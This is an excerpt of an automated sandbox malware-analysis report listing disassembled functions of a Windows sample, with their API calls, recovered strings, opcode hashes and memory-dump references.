                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                            • String ID:
                                            • API String ID: 560350794-0
                                            • Opcode ID: 550a1f429840b4eb8d658bf4d17cfcde6628e0db278246c6261af2e58c25f521
                                            • Instruction ID: ac2953f9392780a3631a54990a34296e6527dd95865cd488bec187db56c07778
                                            • Opcode Fuzzy Hash: 550a1f429840b4eb8d658bf4d17cfcde6628e0db278246c6261af2e58c25f521
                                            • Instruction Fuzzy Hash: B8F10675A00219EFCB04DF94C884EAEBBB9FF59316F108599F905EB250DB31AE49CB50
                                            Function 008624D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 008624F5
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00862688
                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008626AC
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008626EC
                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0086270E
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0086286F
                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008628A1
                                            • CloseHandle.KERNEL32(?), ref: 008628D0
                                            • CloseHandle.KERNEL32(?), ref: 00862947
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                            • String ID:
                                            • API String ID: 4090791747-0
                                            • Opcode ID: 5aee5da762199c65e4775eb5c87ce8756f520a54d8b9df4bd2eb3dc78bcd3f40
                                            • Instruction ID: a8badd6c514c21c7c02311e0d69c162faeaf1f34aa5dfe44cd7a692ce32337ed
                                            • Opcode Fuzzy Hash: 5aee5da762199c65e4775eb5c87ce8756f520a54d8b9df4bd2eb3dc78bcd3f40
                                            • Instruction Fuzzy Hash: DDD17E316047019FCB14EF28C891A6ABBE5FF84314F15859DF999DB2A2DB31EC40CB52
                                            Function 0086B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                            Download Yara Rule
                                            APIs
                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0086B3F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InvalidateRect
                                            • String ID:
                                            • API String ID: 634782764-0
                                            • Opcode ID: 334de32cca41d15c47e298996b77706f0ebe72669d6f4d53ed493c69d9bf8384
                                            • Instruction ID: 3256c3ae7dc3086e4c56a6c7d3462462e6d305ca8e7f5ff726cc5d1d1433a83c
                                            • Opcode Fuzzy Hash: 334de32cca41d15c47e298996b77706f0ebe72669d6f4d53ed493c69d9bf8384
                                            • Instruction Fuzzy Hash: 8D517D31600208BAEF219B688D89FA97BA9FB0531CF664125F615D63E2DB71E9C0CB51
                                            Function 0081A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0087DB1B
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0087DB3C
                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0087DB51
                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0087DB6E
                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0087DB95
                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0081A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0087DBA0
                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0087DBBD
                                            • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0081A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0087DBC8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                            • String ID:
                                            • API String ID: 1268354404-0
                                            • Opcode ID: 5a253d25e8dca2c5782c2969bd3fe229c9f806e40ff3e179c482b1bf5c154555
                                            • Instruction ID: 53a064a2bf0a203d0968e2f8d499bff4937a6566c82fb57625573bda2d0a2bab
                                            • Opcode Fuzzy Hash: 5a253d25e8dca2c5782c2969bd3fe229c9f806e40ff3e179c482b1bf5c154555
                                            • Instruction Fuzzy Hash: 9C515470600308AFDB24DF68CC81FAA77B9FF58364F104529F94ADA2D1D7B0E9909B51
                                            Function 00847555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00845FA6,?), ref: 00846ED8
                                              • Part of subcall function 00846EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00845FA6,?), ref: 00846EF1
                                              • Part of subcall function 008472CB: GetFileAttributesW.KERNEL32(?,00846019), ref: 008472CC
                                            • lstrcmpiW.KERNEL32(?,?), ref: 008475CA
                                            • _wcscmp.LIBCMT ref: 008475E2
                                            • MoveFileW.KERNEL32(?,?), ref: 008475FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                            • String ID:
                                            • API String ID: 793581249-0
                                            • Opcode ID: 724f38d1e156081ff8cb90ee02f752a9054dfb94e04f0f4d1c722cd8cd894c1a
                                            • Instruction ID: ff9ace3bdb5a9842400b924c3549061847edcf68a1696f1d512900e8991c4c10
                                            • Opcode Fuzzy Hash: 724f38d1e156081ff8cb90ee02f752a9054dfb94e04f0f4d1c722cd8cd894c1a
                                            • Instruction Fuzzy Hash: C1510FB2A0922D9ADF60EB98E8459DE73BCFF18310B5040AAF605E3141EB7496C5CF65
                                            Function 0081EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                            Download Yara Rule
                                            APIs
                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0087DAD1,00000004,00000000,00000000), ref: 0081EAEB
                                            • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0087DAD1,00000004,00000000,00000000), ref: 0081EB32
                                            • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0087DAD1,00000004,00000000,00000000), ref: 0087DC86
                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0087DAD1,00000004,00000000,00000000), ref: 0087DCF2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ShowWindow
                                            • String ID:
                                            • API String ID: 1268545403-0
                                            • Opcode ID: de02d3ec819cb2cc41c816f73afd620ae42d812a0509d1bbbb32d60de631ad80
                                            • Instruction ID: b661be79c14a0c1aee8219fae345c613453ac03602eed2954da7fbb09c80ebb7
                                            • Opcode Fuzzy Hash: de02d3ec819cb2cc41c816f73afd620ae42d812a0509d1bbbb32d60de631ad80
                                            • Instruction Fuzzy Hash: 4A41C57120D3849AD7395728CD8DEAA7BBEFF91324F194409F84BE66A1D670B8C0D711
                                            Function 0083B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0083AEF1,00000B00,?,?), ref: 0083B26C
                                            • HeapAlloc.KERNEL32(00000000,?,0083AEF1,00000B00,?,?), ref: 0083B273
                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0083AEF1,00000B00,?,?), ref: 0083B288
                                            • GetCurrentProcess.KERNEL32(?,00000000,?,0083AEF1,00000B00,?,?), ref: 0083B290
                                            • DuplicateHandle.KERNEL32(00000000,?,0083AEF1,00000B00,?,?), ref: 0083B293
                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0083AEF1,00000B00,?,?), ref: 0083B2A3
                                            • GetCurrentProcess.KERNEL32(0083AEF1,00000000,?,0083AEF1,00000B00,?,?), ref: 0083B2AB
                                            • DuplicateHandle.KERNEL32(00000000,?,0083AEF1,00000B00,?,?), ref: 0083B2AE
                                            • CreateThread.KERNEL32(00000000,00000000,0083B2D4,00000000,00000000,00000000), ref: 0083B2C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                            • String ID:
                                            • API String ID: 1957940570-0
                                            • Opcode ID: ae928a5b9f25e86424218ac155371617d95c07e987f587b59a6ca97e89516533
                                            • Instruction ID: 8d4fbc376843c3a41e8bd3aadeed09fbc229ff77c7e4392b90ef58f88fae040f
                                            • Opcode Fuzzy Hash: ae928a5b9f25e86424218ac155371617d95c07e987f587b59a6ca97e89516533
                                            • Instruction Fuzzy Hash: 7201BFB6240344BFE710ABA9EC4DF5B7BACFB88711F014415FA05DB2D1D6749800CB61
                                            Function 0085C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NULL Pointer assignment$Not an Object type
                                            • API String ID: 0-572801152
                                            • Opcode ID: 18637ca9518b8bacdfe2f7bc0440696b62369059997bbf084d997f804e72e2bc
                                            • Instruction ID: 7ba2d4e65ed9849544ef87b698471e62380b57d356f35bb1307aacaab8f373a3
                                            • Opcode Fuzzy Hash: 18637ca9518b8bacdfe2f7bc0440696b62369059997bbf084d997f804e72e2bc
                                            • Instruction Fuzzy Hash: F0E18F71A00319AFDF14DFA8C885AAEB7B5FB48355F148029ED05EB281E770AD49CF91
                                            Function 0085BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit$_memset
                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                            • API String ID: 2862541840-625585964
                                            • Opcode ID: cac100be64d5724b77cc72fde9e16f35a1218afb5962b490080b73138fb202cb
                                            • Instruction ID: c5e46e396cf889e9269f0605d40627f281e64224ada3e2c250d6c5d07a176441
                                            • Opcode Fuzzy Hash: cac100be64d5724b77cc72fde9e16f35a1218afb5962b490080b73138fb202cb
                                            • Instruction Fuzzy Hash: 16919D71A00219ABDF24DFA5C844FAEBBB8FF55715F108159F915EB280DB709948CFA0
                                            Function 00869A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00869B19
                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00869B2D
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00869B47
                                            • _wcscat.LIBCMT ref: 00869BA2
                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00869BB9
                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00869BE7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window_wcscat
                                            • String ID: SysListView32
                                            • API String ID: 307300125-78025650
                                            • Opcode ID: ff2e622ada899c9313e40f57b406c0a8ee64025d1e4c30deb151c85f9f538613
                                            • Instruction ID: 653de53e282e83e785e35429c754a221bca72ac7ddd6d4ff4d1926963fb0ebb4
                                            • Opcode Fuzzy Hash: ff2e622ada899c9313e40f57b406c0a8ee64025d1e4c30deb151c85f9f538613
                                            • Instruction Fuzzy Hash: B6419D70A00318ABDF219FA8D885FEA77A8FB08350F11052AF589E72D2D6719D84CB64
                                            Function 0086172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00846532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00846554
                                              • Part of subcall function 00846532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00846564
                                              • Part of subcall function 00846532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 008465F9
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0086179A
                                            • GetLastError.KERNEL32 ref: 008617AD
                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008617D9
                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00861855
                                            • GetLastError.KERNEL32(00000000), ref: 00861860
                                            • CloseHandle.KERNEL32(00000000), ref: 00861895
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                            • String ID: SeDebugPrivilege
                                            • API String ID: 2533919879-2896544425
                                            • Opcode ID: 66c0a3e1664bf1f62b2dfc88322c1a4c30d480ed96a68233e700baf283e451bb
                                            • Instruction ID: c704205624927bb4f73dd6fab58a173509ef3d1f2967f71a74d8fe8d7638b56a
                                            • Opcode Fuzzy Hash: 66c0a3e1664bf1f62b2dfc88322c1a4c30d480ed96a68233e700baf283e451bb
                                            • Instruction Fuzzy Hash: 90418E71600205AFDB05EF58C899FADB7A6FF54310F098068F906DB3D2DB7499448B92
                                            Function 00845819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadIconW.USER32(00000000,00007F03), ref: 008458B8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconLoad
                                            • String ID: blank$info$question$stop$warning
                                            • API String ID: 2457776203-404129466
                                            • Opcode ID: c2f28c63bbf7bcb85b831e1a290c9a41542dd806d4cf7cf78e1d0826cee03743
                                            • Instruction ID: 4c0470b5ae2e8d81f8b847f3ff95e9bf505a1dde6de24bc77bb626ccdd537b71
                                            • Opcode Fuzzy Hash: c2f28c63bbf7bcb85b831e1a290c9a41542dd806d4cf7cf78e1d0826cee03743
                                            • Instruction Fuzzy Hash: 9211EB3164D75EBBE7015A58AC92DAF739CFF25314B20003AF510E53C3EF74AA404665
                                            Function 0084A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                            Download Yara Rule
                                            APIs
                                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0084A806
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ArraySafeVartype
                                            • String ID:
                                            • API String ID: 1725837607-0
                                            • Opcode ID: 74bea4719dadd879628da304e76297d704df387dc0ab027438fd85fd3cc51eab
                                            • Instruction ID: bc8712fff6fa4c8ebd7cfe7e0b30d8c94fc8204f251eb4936458c7a7a43bce1c
                                            • Opcode Fuzzy Hash: 74bea4719dadd879628da304e76297d704df387dc0ab027438fd85fd3cc51eab
                                            • Instruction Fuzzy Hash: E1C19F75A4021EDFDB18DF98C481BAEBBF4FF08314F24406AE655EB281D734A941CB96
                                            Function 00846B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00846B63
                                            • LoadStringW.USER32(00000000), ref: 00846B6A
                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00846B80
                                            • LoadStringW.USER32(00000000), ref: 00846B87
                                            • _wprintf.LIBCMT ref: 00846BAD
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00846BCB
                                            Strings
                                            • %s (%d) : ==> %s: %s %s, xrefs: 00846BA8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: HandleLoadModuleString$Message_wprintf
                                            • String ID: %s (%d) : ==> %s: %s %s
                                            • API String ID: 3648134473-3128320259
                                            • Opcode ID: 452b6da5945b7ca80bef0bd2dc6b04c795339677cfaea35583324c69f3e386d8
                                            • Instruction ID: 41b67a625f43e6a0b06f64c7425a9cc4027e42ed05458783a5e6caa32f708c51
                                            • Opcode Fuzzy Hash: 452b6da5945b7ca80bef0bd2dc6b04c795339677cfaea35583324c69f3e386d8
                                            • Instruction Fuzzy Hash: 730112F6500318BFEB11A7949D89EE7776CFB08304F004495B746D2181EA749E848B75
                                            Function 00862B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00863C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00862BB5,?,?), ref: 00863C1D
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00862BF6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: BuffCharConnectRegistryUpper
                                            • String ID:
                                            • API String ID: 2595220575-0
                                            • Opcode ID: 7735d06782d6e4b0a481ce3917e7430a33e69b43753ef9e9acc74d4486a5e9d1
                                            • Instruction ID: 1537a19f9bb466ef2ee6deee8aec632b9326696cabaa9bda09a916b21c5e46a5
                                            • Opcode Fuzzy Hash: 7735d06782d6e4b0a481ce3917e7430a33e69b43753ef9e9acc74d4486a5e9d1
                                            • Instruction Fuzzy Hash: 9B9198712046059FCB10EF58C891B6EB7E9FF88314F05885DF996DB2A2DB34E945CB82
                                            Function 008595BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • select.WSOCK32 ref: 00859691
                                            • WSAGetLastError.WSOCK32(00000000), ref: 0085969E
                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 008596C8
                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 008596E9
                                            • WSAGetLastError.WSOCK32(00000000), ref: 008596F8
                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 008597AA
                                            • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0089DC00), ref: 00859765
                                              • Part of subcall function 0083D2FF: _strlen.LIBCMT ref: 0083D309
                                            • _strlen.LIBCMT ref: 00859800
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
